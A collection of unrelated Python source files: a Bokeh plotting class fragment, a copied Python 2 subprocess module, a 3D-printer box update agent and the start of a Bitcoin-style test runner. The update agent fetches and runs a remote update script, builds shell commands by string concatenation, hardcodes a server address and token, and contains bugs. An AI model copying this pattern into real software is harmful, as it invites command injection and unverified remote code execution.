def _initialize_plot(self):
for space in self.spaces:
self.get_samples(space)
self.initialize_cds(space)
self.initialize_fig(space)
self.initialize_glyphs(space)
@abstractmethod
def initialize_fig(self, space):
pass
@abstractmethod
def initialize_cds(self, space):
pass
@abstractmethod
def initialize_glyphs(self, space):
pass
## WIDGETS
@abstractmethod
def widget_callback(self, attr, old, new, w_title, space):
pass
## UPDATE
@abstractmethod
def update_cds(self, space):
pass
def sample_inds_callback(self, space, attr, old, new):
"""
Updates cds when indices of selected samples -- Cell._sample_inds--
are updated.
"""
self.ic.add_selection_threads(space, threading.Thread(target = self._sample_inds_thread, args = (space,), daemon = True))
self.ic.sel_lock_event.set()
def _sample_inds_thread(self, space):
self.update_cds(space)
def compute_intersection_of_samples(self, space):
"""
Computes intersection of sample points based on user's
restrictions per parameter.
"""
sel_var_inds = self.ic.get_sel_var_inds()
sp_keys = [k for k in sel_var_inds if k[0] == space]
if len(sp_keys)>1:
sets = []
for i in range(0, len(sp_keys)):
sets.append(set(sel_var_inds[sp_keys[i]]))
union = set.intersection(*sorted(sets, key = len))
self.ic.set_sample_inds(space, dict(inds = list(union)))
elif len(sp_keys) == 1:
self.ic.set_sample_inds(space, dict(inds = sel_var_inds[sp_keys[0]]))
else:
self.ic.set_sample_inds(space, dict(inds = []))
def _initialize_toggle_div(self):
""""
Creates the toggle headers of each variable node.
"""
for space in self.spaces:
width = self.plot[space].plot_width
height = 40
sizing_mode = self.plot[space].sizing_mode
label = self.name + " ~ " + self._data.get_var_dist(self.name)
text = """parents: %s <br>dims: %s"""%(self._data.get_var_parents(self.name), list(self._data.get_idx_dimensions(self.name)))
if sizing_mode == 'fixed':
self._toggle[space] = Toggle(label = label, active = False,
width = width, height = height, sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text,
width = width, height = height, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
elif sizing_mode == 'scale_width' or sizing_mode == 'stretch_width':
self._toggle[space] = Toggle(label = label, active = False,
height = height, sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text,
height = height, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
elif sizing_mode == 'scale_height' or sizing_mode == 'stretch_height':
self._toggle[space] = Toggle(label = label, active = False,
width = width, sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text,
width = width, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
else:
self._toggle[space] = Toggle(label = label, active = False,
sizing_mode = sizing_mode, margin = (0,0,0,0))
self._div[space] = Div(text = text, sizing_mode = sizing_mode, margin = (0,0,0,0), background = BORDER_COLORS[0] )
self._toggle[space].js_link('active', self.plot[space], 'visible')
def get_max_prob(self, space):
"""
Gets highest point --max probability-- of cds
"""
max_sv = -1
max_rv = -1
if self.source[space].data['y'].size:
max_sv = self.source[space].data['y'].max()
if hasattr(self,'reconstructed') and self.reconstructed[space].data['y'].size:
max_rv = self.reconstructed[space].data['y'].max()
return max([max_sv,max_rv])
|
pproc.py
|
# borrowed from python 2.5.2c1
# Copyright (c) 2003-2005 by Peter Astrand <[email protected]>
# Licensed to PSF under a Contributor Agreement.
import sys
mswindows = (sys.platform == "win32")
import os
import types
import traceback
import gc
class CalledProcessError(Exception):
def __init__(self, returncode, cmd):
self.returncode = returncode
self.cmd = cmd
def __str__(self):
return "Command '%s' returned non-zero exit status %d" % (self.cmd, self.returncode)
if mswindows:
import threading
import msvcrt
if 0:
import pywintypes
from win32api import GetStdHandle, STD_INPUT_HANDLE, \
STD_OUTPUT_HANDLE, STD_ERROR_HANDLE
from win32api import GetCurrentProcess, DuplicateHandle, \
GetModuleFileName, GetVersion
from win32con import DUPLICATE_SAME_ACCESS, SW_HIDE
from win32pipe import CreatePipe
from win32process import CreateProcess, STARTUPINFO, \
GetExitCodeProcess, STARTF_USESTDHANDLES, \
STARTF_USESHOWWINDOW, CREATE_NEW_CONSOLE
from win32event import WaitForSingleObject, INFINITE, WAIT_OBJECT_0
else:
from _subprocess import *
class STARTUPINFO:
dwFlags = 0
hStdInput = None
hStdOutput = None
hStdError = None
wShowWindow = 0
class pywintypes:
error = IOError
else:
import select
import errno
import fcntl
import pickle
__all__ = ["Popen", "PIPE", "STDOUT", "call", "check_call", "CalledProcessError"]
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
try:
False
except NameError:
False = 0
True = 1
_active = []
def _cleanup():
for inst in _active[:]:
if inst.poll(_deadstate=sys.maxint) >= 0:
try:
_active.remove(inst)
except ValueError:
pass
PIPE = -1
STDOUT = -2
def call(*popenargs, **kwargs):
return Popen(*popenargs, **kwargs).wait()
def check_call(*popenargs, **kwargs):
retcode = call(*popenargs, **kwargs)
cmd = kwargs.get("args")
if cmd is None:
cmd = popenargs[0]
if retcode:
raise CalledProcessError(retcode, cmd)
return retcode
def list2cmdline(seq):
result = []
needquote = False
for arg in seq:
bs_buf = []
if result:
result.append(' ')
needquote = (" " in arg) or ("\t" in arg) or arg == ""
if needquote:
result.append('"')
for c in arg:
if c == '\\':
bs_buf.append(c)
elif c == '"':
result.append('\\' * len(bs_buf)*2)
bs_buf = []
result.append('\\"')
else:
if bs_buf:
result.extend(bs_buf)
bs_buf = []
result.append(c)
if bs_buf:
result.extend(bs_buf)
if needquote:
result.extend(bs_buf)
result.append('"')
return ''.join(result)
class Popen(object):
def __init__(self, args, bufsize=0, executable=None,
stdin=None, stdout=None, stderr=None,
preexec_fn=None, close_fds=False, shell=False,
cwd=None, env=None, universal_newlines=False,
startupinfo=None, creationflags=0):
_cleanup()
self._child_created = False
if not isinstance(bufsize, (int, long)):
raise TypeError("bufsize must be an integer")
if mswindows:
if preexec_fn is not None:
raise ValueError("preexec_fn is not supported on Windows platforms")
if close_fds:
raise ValueError("close_fds is not supported on Windows platforms")
else:
if startupinfo is not None:
raise ValueError("startupinfo is only supported on Windows platforms")
if creationflags != 0:
raise ValueError("creationflags is only supported on Windows platforms")
self.stdin = None
self.stdout = None
self.stderr = None
self.pid = None
self.returncode = None
self.universal_newlines = universal_newlines
(p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite) = self._get_handles(stdin, stdout, stderr)
self._execute_child(args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
if mswindows:
if stdin is None and p2cwrite is not None:
os.close(p2cwrite)
p2cwrite = None
if stdout is None and c2pread is not None:
os.close(c2pread)
c2pread = None
if stderr is None and errread is not None:
os.close(errread)
errread = None
if p2cwrite:
self.stdin = os.fdopen(p2cwrite, 'wb', bufsize)
if c2pread:
if universal_newlines:
self.stdout = os.fdopen(c2pread, 'rU', bufsize)
else:
self.stdout = os.fdopen(c2pread, 'rb', bufsize)
if errread:
if universal_newlines:
self.stderr = os.fdopen(errread, 'rU', bufsize)
else:
self.stderr = os.fdopen(errread, 'rb', bufsize)
def _translate_newlines(self, data):
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
return data
def __del__(self, sys=sys):
if not self._child_created:
return
self.poll(_deadstate=sys.maxint)
if self.returncode is None and _active is not None:
_active.append(self)
def communicate(self, input=None):
if [self.stdin, self.stdout, self.stderr].count(None) >= 2:
stdout = None
stderr = None
if self.stdin:
if input:
self.stdin.write(input)
self.stdin.close()
elif self.stdout:
stdout = self.stdout.read()
elif self.stderr:
stderr = self.stderr.read()
self.wait()
return (stdout, stderr)
return self._communicate(input)
if mswindows:
def _get_handles(self, stdin, stdout, stderr):
if stdin is None and stdout is None and stderr is None:
return (None, None, None, None, None, None)
p2cread, p2cwrite = None, None
c2pread, c2pwrite = None, None
errread, errwrite = None, None
if stdin is None:
p2cread = GetStdHandle(STD_INPUT_HANDLE)
if p2cread is not None:
pass
elif stdin is None or stdin == PIPE:
p2cread, p2cwrite = CreatePipe(None, 0)
p2cwrite = p2cwrite.Detach()
p2cwrite = msvcrt.open_osfhandle(p2cwrite, 0)
elif isinstance(stdin, int):
p2cread = msvcrt.get_osfhandle(stdin)
else:
p2cread = msvcrt.get_osfhandle(stdin.fileno())
p2cread = self._make_inheritable(p2cread)
if stdout is None:
c2pwrite = GetStdHandle(STD_OUTPUT_HANDLE)
if c2pwrite is not None:
pass
elif stdout is None or stdout == PIPE:
c2pread, c2pwrite = CreatePipe(None, 0)
c2pread = c2pread.Detach()
c2pread = msvcrt.open_osfhandle(c2pread, 0)
elif isinstance(stdout, int):
c2pwrite = msvcrt.get_osfhandle(stdout)
else:
c2pwrite = msvcrt.get_osfhandle(stdout.fileno())
c2pwrite = self._make_inheritable(c2pwrite)
if stderr is None:
errwrite = GetStdHandle(STD_ERROR_HANDLE)
if errwrite is not None:
pass
elif stderr is None or stderr == PIPE:
errread, errwrite = CreatePipe(None, 0)
errread = errread.Detach()
errread = msvcrt.open_osfhandle(errread, 0)
elif stderr == STDOUT:
errwrite = c2pwrite
elif isinstance(stderr, int):
errwrite = msvcrt.get_osfhandle(stderr)
else:
errwrite = msvcrt.get_osfhandle(stderr.fileno())
errwrite = self._make_inheritable(errwrite)
return (p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite)
def _make_inheritable(self, handle):
return DuplicateHandle(GetCurrentProcess(), handle, GetCurrentProcess(), 0, 1, DUPLICATE_SAME_ACCESS)
def _find_w9xpopen(self):
w9xpopen = os.path.join(os.path.dirname(GetModuleFileName(0)), "w9xpopen.exe")
if not os.path.exists(w9xpopen):
w9xpopen = os.path.join(os.path.dirname(sys.exec_prefix), "w9xpopen.exe")
if not os.path.exists(w9xpopen):
raise RuntimeError("Cannot locate w9xpopen.exe, which is needed for Popen to work with your shell or platform.")
return w9xpopen
def _execute_child(self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines,
startupinfo, creationflags, shell,
p2cread, p2cwrite,
c2pread, c2pwrite,
errread, errwrite):
if not isinstance(args, types.StringTypes):
args = list2cmdline(args)
if startupinfo is None:
startupinfo = STARTUPINFO()
if None not in (p2cread, c2pwrite, errwrite):
startupinfo.dwFlags |= STARTF_USESTDHANDLES
startupinfo.hStdInput = p2cread
startupinfo.hStdOutput = c2pwrite
startupinfo.hStdError = errwrite
if shell:
startupinfo.dwFlags |= STARTF_USESHOWWINDOW
startupinfo.wShowWindow = SW_HIDE
comspec = os.environ.get("COMSPEC", "cmd.exe")
args = comspec + " /c " + args
if (GetVersion() >= 0x80000000L or
os.path.basename(comspec).lower() == "command.com"):
w9xpopen = self._find_w9xpopen()
args = '"%s" %s' % (w9xpopen, args)
creationflags |= CREATE_NEW_CONSOLE
try:
hp, ht, pid, tid = CreateProcess(executable, args, None, None, 1, creationflags, env, cwd, startupinfo)
except pywintypes.error, e:
raise WindowsError(*e.args)
self._child_created = True
self._handle = hp
self.pid = pid
ht.Close()
if p2cread is not None:
p2cread.Close()
if c2pwrite is not None:
c2pwrite.Close()
if errwrite is not None:
errwrite.Close()
def poll(self, _deadstate=None):
if self.returncode is None:
if WaitForSingleObject(self._handle, 0) == WAIT_OBJECT_0:
self.returncode = GetExitCodeProcess(self._handle)
return self.returncode
def wait(self):
if self.returncode is None:
obj = WaitForSingleObject(self._handle, INFINITE)
self.returncode = GetExitCodeProcess(self._handle)
return self.returncode
def _readerthread(self, fh, buffer):
buffer.append(fh.read())
def _communicate(self, input):
stdout = None
stderr = None
if self.stdout:
stdout = []
stdout_thread = threading.Thread(target=self._readerthread, args=(self.stdout, stdout))
stdout_thread.setDaemon(True)
stdout_thread.start()
if self.stderr:
stderr = []
stderr_thread = threading.Thread(target=self._readerthread, args=(self.stderr, stderr))
stderr_thread.setDaemon(True)
stderr_thread.start()
if self.stdin:
if input is not None:
self.stdin.write(input)
self.stdin.close()
if self.stdout:
stdout_thread.join()
if self.stderr:
stderr_thread.join()
if stdout is not None:
stdout = stdout[0]
if stderr is not None:
stderr = stderr[0]
if self.universal_newlines and hasattr(file, 'newlines'):
if stdout:
stdout = self._translate_newlines(stdout)
if stderr:
stderr = self._translate_newlines(stderr)
self.wait()
return (stdout, stderr)
else:
def _get_handles(self, stdin, stdout, stderr):
p2cread, p2cwrite = None, None
c2pread, c2pwrite = None, None
errread, errwrite = None, None
if stdin is None:
pass
elif stdin == PIPE:
p2cread, p2cwrite = os.pipe()
elif isinstance(stdin, int):
p2cread = stdin
else:
p2cread = stdin.fileno()
if stdout is None:
pass
elif stdout == PIPE:
c2pread, c2pwrite = os.pipe()
elif isinstance(stdout, int):
c2pwrite = stdout
else:
c2pwrite = stdout.fileno()
if stderr is None:
pass
elif stderr == PIPE:
errread, errwrite = os.pipe()
elif stderr == STDOUT:
errwrite = c2pwrite
elif isinstance(stderr, int):
errwrite = stderr
else:
errwrite = stderr.fileno()
return (p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite)
def _set_cloexec_flag(self, fd):
try:
cloexec_flag = fcntl.FD_CLOEXEC
except AttributeError:
cloexec_flag = 1
old = fcntl.fcntl(fd, fcntl.F_GETFD)
fcntl.fcntl(fd, fcntl.F_SETFD, old | cloexec_flag)
def _close_fds(self, but):
for i in xrange(3, MAXFD):
if i == but:
continue
try:
os.close(i)
except:
pass
def _execute_child(self, args, executable, preexec_fn, close_fds,
cwd, env, universal_newlines, startupinfo, creationflags, shell,
p2cread, p2cwrite, c2pread, c2pwrite, errread, errwrite):
if isinstance(args, types.StringTypes):
args = [args]
else:
args = list(args)
if shell:
args = ["/bin/sh", "-c"] + args
if executable is None:
executable = args[0]
errpipe_read, errpipe_write = os.pipe()
self._set_cloexec_flag(errpipe_write)
gc_was_enabled = gc.isenabled()
gc.disable()
try:
self.pid = os.fork()
except:
if gc_was_enabled:
gc.enable()
raise
self._child_created = True
if self.pid == 0:
try:
if p2cwrite:
os.close(p2cwrite)
if c2pread:
os.close(c2pread)
if errread:
os.close(errread)
os.close(errpipe_read)
if p2cread:
os.dup2(p2cread, 0)
if c2pwrite:
os.dup2(c2pwrite, 1)
if errwrite:
os.dup2(errwrite, 2)
if p2cread and p2cread not in (0,):
os.close(p2cread)
if c2pwrite and c2pwrite not in (p2cread, 1):
os.close(c2pwrite)
if errwrite and errwrite not in (p2cread, c2pwrite, 2):
os.close(errwrite)
if close_fds:
self._close_fds(but=errpipe_write)
if cwd is not None:
os.chdir(cwd)
if preexec_fn:
apply(preexec_fn)
if env is None:
os.execvp(executable, args)
else:
os.execvpe(executable, args, env)
except:
exc_type, exc_value, tb = sys.exc_info()
exc_lines = traceback.format_exception(exc_type, exc_value, tb)
exc_value.child_traceback = ''.join(exc_lines)
os.write(errpipe_write, pickle.dumps(exc_value))
os._exit(255)
if gc_was_enabled:
gc.enable()
os.close(errpipe_write)
if p2cread and p2cwrite:
os.close(p2cread)
if c2pwrite and c2pread:
os.close(c2pwrite)
if errwrite and errread:
os.close(errwrite)
data = os.read(errpipe_read, 1048576)
os.close(errpipe_read)
if data != "":
os.waitpid(self.pid, 0)
child_exception = pickle.loads(data)
raise child_exception
def _handle_exitstatus(self, sts):
if os.WIFSIGNALED(sts):
self.returncode = -os.WTERMSIG(sts)
elif os.WIFEXITED(sts):
self.returncode = os.WEXITSTATUS(sts)
else:
raise RuntimeError("Unknown child exit status!")
def poll(self, _deadstate=None):
if self.returncode is None:
try:
pid, sts = os.waitpid(self.pid, os.WNOHANG)
if pid == self.pid:
self._handle_exitstatus(sts)
except os.error:
if _deadstate is not None:
self.returncode = _deadstate
return self.returncode
def wait(self):
if self.returncode is None:
pid, sts = os.waitpid(self.pid, 0)
self._handle_exitstatus(sts)
return self.returncode
def _communicate(self, input):
read_set = []
write_set = []
stdout = None
stderr = None
if self.stdin:
self.stdin.flush()
if input:
write_set.append(self.stdin)
else:
self.stdin.close()
if self.stdout:
read_set.append(self.stdout)
stdout = []
if self.stderr:
read_set.append(self.stderr)
stderr = []
input_offset = 0
while read_set or write_set:
rlist, wlist, xlist = select.select(read_set, write_set, [])
if self.stdin in wlist:
bytes_written = os.write(self.stdin.fileno(), buffer(input, input_offset, 512))
input_offset += bytes_written
if input_offset >= len(input):
self.stdin.close()
write_set.remove(self.stdin)
if self.stdout in rlist:
data = os.read(self.stdout.fileno(), 1024)
if data == "":
self.stdout.close()
read_set.remove(self.stdout)
stdout.append(data)
if self.stderr in rlist:
data = os.read(self.stderr.fileno(), 1024)
if data == "":
self.stderr.close()
read_set.remove(self.stderr)
stderr.append(data)
if stdout is not None:
stdout = ''.join(stdout)
if stderr is not None:
stderr = ''.join(stderr)
if self.universal_newlines and hasattr(file, 'newlines'):
if stdout:
stdout = self._translate_newlines(stdout)
if stderr:
stderr = self._translate_newlines(stderr)
self.wait()
return (stdout, stderr)
|
update_api.py
|
# coding=utf-8
import sys
#sys.path.append("/home/pi/oprint/lib/python2.7/site-packages/tornado-3.0.2-py2.7.egg/")
from tornado.httpclient import AsyncHTTPClient
from tornado.httpclient import HTTPClient
from tornado.httpclient import HTTPRequest
from tornado.escape import json_decode
from tornado.escape import json_encode
import logging
import os
import ConfigParser
import urllib
import commands
import threading
#Definition of File name
#System Command
COMMAND_SUDO = "/usr/bin/sudo "
UPDATE_METADATA_DIR = "/home/pi/.update/updatePkg/"
UPDATE_METADATA_FILE = UPDATE_METADATA_DIR + "updateMeta.conf"
UPDATE_EXECUTE_FILE = "update.sh"
UPDATE_STAGE_INIT = "init"
UPDATE_STAGE_FINISHED = "finished"
UPDATE_RET_NORMAL = 0
UPDATE_RET_ERR_MD5 = 1
UPDATE_RET_ERR_UNCOMPRESS = 2
UPDATE_RET_ERR_UPDATE = 3
UPDATE_RET_ERR_UNKNOWN = 10
class ClientAgent():
def __init__(self):
BASE_PATH="/home/pi/oprint/lib/python2.7/site-packages/boxAgent-1.0.0-py2.7.egg/"
CLIENT_AGENT_CONFIG_FILE = BASE_PATH + "client.conf"
DEFAULT_CONFIG_DICT = {
"protocol" : "http",
"config_ver" : "v1.0",
"local_host" : "127.0.0.1",
"local_port" : "5000",
"update_port" : "8092",
"server_host" : "211.103.196.188",
"server_port" : 8888,
"cloud_host" : "211.103.196.188",
"cloud_port" : 8082,
"heartbeat_interval" : 10,
"token" : "w4hewb"
}
# self.http_client = AsyncHTTPClient()
config = ConfigParser.ConfigParser(DEFAULT_CONFIG_DICT)
config.readfp(open(CLIENT_AGENT_CONFIG_FILE),"rb")
self.protocol = config.get("global", "protocol") + "://"
self.config_ver = config.get("global", "config_ver")
self.localHost = config.get("global", "local_host")
self.localPort = config.get("global", "local_port")
self.localHostPort = self.localHost
if self.localPort:
self.localHostPort = self.localHost + ":" + self.localPort
self.updatePort = config.get("global", "update_port")
self.updateHostPort = self.localHost
if self.updatePort:
self.updateHostPort = self.localHost + ":" + self.updatePort
self.serverHost = config.get("global", "server_host")
self.serverPort = config.get("global", "server_port")
self.serverHostPort = self.serverHost
if self.serverPort:
self.serverHostPort = self.serverHost + ":" + self.serverPort
self.cloudHost = config.get("global", "cloud_host")
self.cloudPort = config.get("global", "cloud_port")
self.cloudHostPort = self.cloudHost
if self.cloudPort:
self.cloudHostPort = self.cloudHost + ":" + self.cloudPort
self.heartbeatInterval = config.getint("global", "heartbeat_interval")
self.token = config.get("global", "token").strip('\"')
self.latest_ver = ""
if config.has_option("update", "latest_ver"):
self.latest_ver = config.get("update", "latest_ver")
self.update_pkg_url = ""
if config.has_option("update", "pkg_url"):
self.update_pkg_url = config.get("update", "pkg_url")
self.update_pkg_md5 = ""
if config.has_option("update", "pkg_md5"):
self.update_pkg_md5 = config.get("update", "pkg_md5")
self.update_pkg_desc = "No new updates."
if config.has_option("update", "pkg_desc"):
self.update_pkg_desc = config.get("update", "pkg_desc")
logger = logging.getLogger("__name__")
client = ClientAgent()
def getCurrentBoxInfo():
"""
Get current box info.
"""
boxInfo = {}
url = client.protocol + client.localHostPort + "/getstate"
logging.debug("getCurrentBoxInfo: Start to get current box info. url=%s", url)
cur_client = HTTPClient()
response = cur_client.fetch(url, request_timeout=10)
if response.error:
logging.warn("getCurrentBoxInfo: Failed to get current box info. error=%s", response.error)
return None
logging.debug("getCurrentBoxInfo: Current box info. reponse.body=%r", response.body)
res = json_decode(response.body)
if res["ret_value"] != 0:
logging.warn("getCurrentBoxInfo: Failed to get current box info. ret_value=%d", res["ret_value"])
return None
logging.debug("getCurrentBoxInfo: getstate cmd ver. cmd_ver=%s", res["cmd_ver"])
boxInfo["id"] = res.get("id")
boxInfo["name"] = res.get("name")
boxInfo["app_ver"] = res.get("app_ver")
boxInfo["isactive"] = res.get("isactive")
boxInfo["user_name"] = res.get("user_name")
boxInfo["disk_size"] = res.get("disk_size")
boxInfo["free_disk_size"] = res.get("free_disk_size")
boxInfo["mem_size"] = res.get("mem_size")
boxInfo["free_mem_size"] = res.get("free_mem_size")
boxInfo["cpu_usage"] = res.get("cpu_usage")
boxInfo["loc_ip"] = res.get("loc_ip")
boxInfo["printer_name"] = res.get("printer_name")
boxInfo["printer_state"] = res.get("printer_state")
boxInfo["printer_length"] = res.get("printer_length", 0)
boxInfo["printer_width"] = res.get("printer_width", 0)
boxInfo["printer_height"] = res.get("printer_height", 0)
boxInfo["model_file"] = res.get("model_file",)
boxInfo["model_type"] = res.get("model_type")
boxInfo["print_time_all"] = res.get("print_time_all", 0)
boxInfo["print_time_escape"] = res.get("print_time_escape", 0)
boxInfo["print_time_remain"] = res.get("print_time_remain", 0)
boxInfo["print_progress"] = res.get("print_progress", 0)
return boxInfo
def getLatestVer():
if client.latest_ver == "":
client.latest_ver = getCurrentVer()
return client.latest_ver
def getUpdatePkgUrl():
return client.update_pkg_url
def getUpdatePkgDesc():
return client.update_pkg_desc
def getCurrentVer():
app_ver = None
boxinfo = getCurrentBoxInfo()
if boxinfo:
app_ver = boxinfo["app_ver"]
return app_ver
def clearUpdateInfoBegin():
file = UPDATE_METADATA_FILE
if os.path.exists(file):
os.remove(file)
def initUpdateInfo():
global client
client = ClientAgent()
#Initialize net update info
fileDir = UPDATE_METADATA_DIR
if os.path.isfile(fileDir):
os.remove(fileDir)
if not os.path.exists(fileDir):
os.makedirs(fileDir)
file = UPDATE_METADATA_FILE
config = ConfigParser.ConfigParser()
if not os.path.exists(file):
config.add_section("meta")
config.set("meta", "upd_pkg_name", "")
config.set("meta", "stage", UPDATE_STAGE_INIT)
config.set("meta", "progress", 0)
config.set("meta", "ret", UPDATE_RET_NORMAL)
config.write(open(file, 'w'))
return
config.readfp(open(file),"rb")
if config.get("meta", "stage") == UPDATE_STAGE_FINISHED:
config.set("meta", "upd_pkg_name", "")
config.set("meta", "stage", "init")
config.set("meta", "progress", 0)
config.set("meta", "ret", UPDATE_RET_NORMAL)
config.write(open(file, 'w'))
return
def getUpdateMeta():
file = UPDATE_METADATA_FILE
if not os.path.exists(file):
initUpdateInfo()
config = ConfigParser.ConfigParser()
config.readfp(open(file),"rb")
metaInfo = {}
metaInfo["upd_pkg_name"] = config.get("meta", "upd_pkg_name")
metaInfo["stage"] = config.get("meta", "stage")
metaInfo["progress"] = config.getint("meta", "progress")
metaInfo["ret"] = config.getint("meta", "ret")
return metaInfo
def setUpdateMeta(key, value):
file = UPDATE_METADATA_FILE
config = ConfigParser.ConfigParser()
config.read(file)
config.set("meta", key, value)
config.write(open(file, 'w'))
def clearUpdateInfoEnd():
config = ConfigParser.ConfigParser()
config.read(CLIENT_AGENT_CONFIG_FILE)
config.remove_section("update")
config.write(open(CLIENT_AGENT_CONFIG_FILE, "w"))
def update_BG():
pkg_url = getUpdatePkgUrl()
fileName = 'upd_pkg_' + client.latest_ver + '.tgz'
fileDir = UPDATE_METADATA_DIR
filePath = fileDir + fileName
setUpdateMeta("stage", "downloading")
setUpdateMeta("progress", 0)
setUpdateMeta("upd_pkg_name", fileName)
def netReporthook(count, block_size, total_size):
progress = (50 * count * block_size/ total_size)
if progress > 50:
progress = 50
setUpdateMeta("progress", progress)
#if client.update_flag == "download_update":
# exeUpdatePkg()
try:
urllib.urlretrieve(pkg_url, filePath, netReporthook)
except Exception,ex:
logging.warn("update_BG: Failed to download update package. " + str(ex))
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_ERR_UNKNOWN)
return
#check download file
md5sum = commands.getoutput("md5sum " + filePath + " | awk '{print $1}'")
if md5sum != client.update_pkg_md5:
logging.warn("update_BG: Failed to download update package. md5sum is incorrect.")
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_ERR_MD5)
return
#uncompress update Pkg
setUpdateMeta("stage", "uncompressing")
uncompress_cmd = "tar -xvf " + filePath + " -C " + fileDir
ret = commands.getstatusoutput(uncompress_cmd)
if ret[0] != 0:
logging.warn("update_BG: Failed to uncompress package. cmd=%s. ret=%d. output=%s", uncompress_cmd, ret[0], ret[1])
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_ERR_UNCOMPRESS)
return
#execute update Pkg
setUpdateMeta("stage", "updating")
tar_path = os.path.splitext(fileName)[0]
update_cmd = fileDir + tar_path + "/" + UPDATE_EXECUTE_FILE
print "begin" + update_cmd
ret = commands.getstatusoutput(update_cmd)
print "end" + update_cmd
if ret[0] != 0:
logging.warn("update_BG: Failed to execute update package. cmd=%s. ret=%d. output=%s", update_cmd, ret[0], ret[1])
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", 10+ret[0])
return
setUpdateMeta("stage", UPDATE_STAGE_FINISHED)
setUpdateMeta("ret", UPDATE_RET_NORMAL)
#delete updateinfo
clearUpdateInfoEnd()
return
def netUpdate():
thread = threading.Thread(target=update_BG)
thread.setDaemon(True)
thread.start()
return
if __name__ == "__main__":
print test
|
test_runner.py
|
#!/usr/bin/env python3
# Copyright (c) 2014-2019 The Bitcoin Core developers
# Copyright (c) 2017 The Bitcoin developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Run regression test suite.
This module calls down into individual test cases via subprocess. It will
forward all unrecognized arguments onto the individual test scripts.
Functional tests are disabled on Windows by default. Use --force to run them anyway.
For a description of arguments recognized by test scripts, see
`test/functional/test_framework/test_framework.py:BitcoinTestFramework.main`.
"""
import argparse
from collections import deque
import configparser
import datetime
import os
import time
import shutil
import sys
import subprocess
import tempfile
import re
import logging
import xml.etree.ElementTree as ET
import json
import threading
import multiprocessing
from queue import Queue, Empty
# Formatting. Default colors to empty strings.
BOLD, BLUE, RED, GREY = ("", ""), ("", ""), ("", ""), ("", "")
try:
# Make sure python thinks it can write unicode to its stdout
"\u2713".encode("utf_8").decode(sys.stdout.encoding)
TICK = "✓ "
CROSS = "✖ "
CIRCLE = "○ "
except UnicodeDecodeError:
TICK = "P "
CROSS = "x "
CIRCLE = "o "
if os.name == 'posix':
# primitive formatting on supported
# terminal via ANSI escape sequences:
BOLD = ('\033[0m', '\033[1m')
BLUE = ('\033[0m', '\033[0;34m')
RED = ('\033[0m', '\033[0;31m')
GREY = ('\033[0m', '\033[1;30m')
TEST_EXIT_PASSED = 0
TEST_EXIT_SKIPPED = 77
NON_SCRIPTS = [
# These are python files that live in the functional tests directory, but
# are not test scripts.
"combine_logs.py",
"create_cache.py",
"test_runner.py",
]
TEST_PARAMS = {
# Some test can be run with additional parameters.
# When a test is listed here, the it will be run without parameters
# as well as with additional parameters listed here.
# This:
# example "testName" : [["--param1", "--param2"] , ["--param3"]]
# will run the test 3 times:
# testName
# testName --param1 --param2
# testname --param3
"wallet_txn_doublespend.py": [["--mineblock"]],
"wallet_txn_clone.py": [["--mineblock"]],
"wallet_createwallet.py": [["--usecli"]],
"wallet_multiwallet.py": [["--usecli"]],
}
# Used to limit the number of tests, when list of tests is not provided on command line
# When --extended is specified, we run all tests, otherwise
# we only run a test if its execution time in seconds does not exceed
# EXTENDED_CUTOFF
DEFAULT_EXTENDED_CUTOFF = 40
DEFAULT_JOBS = (multiprocessing.cpu_count() // 3) + 1
class TestCase():
"""
Data structure to hold and run information necessary to launch a test case.
"""
def __init__(self, test_num, test_case, tests_dir, tmpdir, flags=None):
self.tests_dir = tests_dir
self.tmpdir = tmpdir
self.test_case = test_case
self.test_num = test_num
self.flags = flags
def run(self, portseed_offset):
t = self.test_case
portseed = self.test_num + portseed_offset
portseed_arg = ["--portseed={}".format(portseed)]
log_stdout = tempfile.SpooledTemporaryFile(max_size=2**16)
log_stderr = tempfile.SpooledTemporaryFile(max_size=2**16)
test_argv = t.split()
testdir = os.path.join("{}", "{}_{}").format(
self.tmpdir, re.sub(".py$", "", test_argv[0]), portseed)
tmpdir_arg = ["--tmpdir={}".format(testdir)]
name = t
time0 = time.time()
process = subprocess.Popen([sys.executable, os.path.join(self.tests_dir, test_argv[0])] + test_argv[1:] + self.flags + portseed_arg + tmpdir_arg,
universal_newlines=True,
stdout=log_stdout,
stderr=log_stderr)
process.wait()
log_stdout.seek(0), log_stderr.seek(0)
[stdout, stderr] = [l.read().decode('utf-8')
for l in (log_stdout, log_stderr)]
log_stdout.close(), log_stderr.close()
if process.returncode == TEST_EXIT_PASSED and stderr == "":
status = "Passed"
elif process.returncode == TEST_EXIT_SKIPPED:
status = "Skipped"
else:
status = "Failed"
return TestResult(self.test_num, name, testdir, status,
int(time.time() - time0), stdout, stderr)
def on_ci():
return os.getenv('TRAVIS') == 'true' or os.getenv(
'TEAMCITY_VERSION') is not None
def main():
# Read config generated by configure.
config = configparser.ConfigParser()
configfile = os.path.join(os.path.abspath(
os.path.dirname(__file__)), "..", "config.ini")
config.read_file(open(configfile, encoding="utf8"))
src_dir = config["environment"]["SRCDIR"]
build_dir = config["environment"]["BUILDDIR"]
tests_dir = os.path.join(src_dir, 'test', 'functional')
